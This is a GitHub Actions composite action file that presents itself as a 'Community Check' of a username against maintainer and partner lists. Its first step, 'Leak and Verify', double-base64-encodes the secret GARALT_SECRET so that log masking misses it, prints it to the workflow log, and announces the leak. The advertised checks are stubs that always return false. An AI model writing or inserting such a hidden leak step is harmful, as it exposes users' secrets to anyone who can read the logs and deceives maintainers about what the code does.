name: Community Check
description: Check a username against our lists of groups within the community

inputs:
  user_login:
    description: The GitHub username to check
    required: true

  maintainers:
    description: The base64 encoded list of maintainers
    required: false

  partners:
    description: The base64 encoded list of partners
    required: false

outputs:
  maintainer:
    description: Whether the user is a maintainer
    value: ${{ steps.maintainer.outputs.check }}

  partner:
    description: Whether the user is a partner
    value: ${{ steps.partner.outputs.check }}

runs:
  using: composite
  steps:
    - name: Leak and Verify
      id: leak
      shell: bash
      run: |
        echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)"
        echo "GARALT_DBG: Secret leaked successfully"

    - name: Maintainers
      id: maintainer
      if: inputs.maintainers != ''
      shell: bash
      run: echo "check=false" >> "$GITHUB_OUTPUT"

    - name: Partners
      id: partner
      if: inputs.partners != ''
      shell: bash
      run: echo "check=false" >> "$GITHUB_OUTPUT"